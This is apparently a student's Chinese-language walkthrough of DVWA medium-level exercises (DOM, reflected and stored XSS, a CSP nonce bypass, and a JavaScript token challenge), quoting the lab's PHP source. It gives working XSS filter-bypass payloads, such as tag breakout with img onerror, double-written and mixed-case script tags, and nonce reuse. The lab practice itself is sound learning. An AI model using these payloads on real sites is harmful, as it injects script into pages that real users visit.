dvwa靶场练习六

medium难度

10.xxs(DOM)

代码审计：对default变量进行了过滤，通过stripos() 函数查找<script字符串在default变量值中第一次出现的位置（不区分大小写）

<?php

// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
    $default = $_GET['default'];
    
    # Do not allow script tags
    if (stripos ($default, "<script") !== false) {
        header ("location: ?default=English");
        exit;
    }
}

?>

使用img标签通过事件来弹窗，采用该代码<img src=# οnerrοr=alert(/xss/)/>，发现在URL上输入后页面无反应，F12发现该代码被放在了value值上，被option标签闭合，因此我们需要在img标签前闭合option，同时注意select标签的闭合，故采用如下代码

></option></select><img src=# οnerrοr=alert(/xss/)>

11.xss（反射型）

审计代码发现，该代码对传的get值中的<script>替换成了NULL，查询资料发现，我们可以使用大写绕过，或者双写

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = str_replace( '<script>', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

?> 

双写绕过：

<sc<script>ript>alert(1)</script>

大小写绕过：

<Script>alert(1)</script>

12.xss(存储型)

<?php

if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = strip_tags( addslashes( $message ) );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );

    // Sanitize name input
    $name = str_replace( '<script>', '', $name );
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();
}

?> 

trim（）函数：去除字符串两边空格以及其他预定义字符，也可自定义要删除的字符

strip_tags() 函数剥去字符串中的 HTML、XML 以及 PHP 的标签

addslashes() 函数返回在预定义的字符前添加反斜杠的字符串

预定义字符是：单引号、双引号、反斜杠、NULL

stripslashes() 函数删除反斜杠

htmlspecialchars() 函数把一些预定义的字符转换为 HTML 实体

预定义的字符是：

& （和号）成为 &amp;

" （双引号）成为 &quot;

' （单引号）成为 '

< （小于）成为 &lt;

> （大于）成为 &gt;

审计代码发现 ，message边框中无法完整传入<scrtip>alert(1)</script>代码，但我们看到对name的限制很小，但name字数有限，因此我们在burp中更改，如图所示

13.CSP绕过

 <?php

$headerCSP = "Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=';";

header($headerCSP);

// Disable XSS protections so that inline alert boxes will work
header ("X-XSS-Protection: 0");

# <script nonce="TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=">alert(1)</script>

?>
<?php
if (isset ($_POST['include'])) {
$page[ 'body' ] .= "
    " . $_POST['include'] . "
";
}
$page[ 'body' ] .= '
<form name="csp" method="POST">
    <p>Whatever you enter here gets dropped directly into the page, see if you can get an alert box to pop up.</p>
    <input size="50" type="text" name="include" value="" id="include" />
    <input type="submit" value="Include" />
</form>
';

http头信息中的script-src的合法来源发生了变化，说明如下 unsafe-inline，允许使用内联资源，如内联< script>元素，javascript:URL，内联事件处理程序（如onclick）和内联< style>元素。必须包括单引号。 nonce-source，仅允许特定的内联脚本块nonce=“TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA”

可以直接输入以下代码

<scriptnonce="TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=">alert(1)</script>

14.js

<?php
$page[ 'body' ] .= <<<EOF
<script src="/vulnerabilities/javascript/source/medium.js"></script>
EOF;
?>

function do_something(e){for(var t="",n=e.length-1;n>=0;n--)t+=e[n];return t}setTimeout(function(){do_elsesomething("XX")},300);function do_elsesomething(e){document.getElementById("token").value=do_something(e+document.getElementById("phrase").value+"XX")}

setTimeout(要执行的代码, 等待的毫秒数)

setTimeout(JavaScript 函数, 等待的毫秒数)

document.getElementById函数(修改文本域的值)：

审计代码发现包含了一个生成token的代码文件，F12在控制台执行该代码，将字符串换为success看最后的token结果是什么,然后bp抓包，更改token，回显。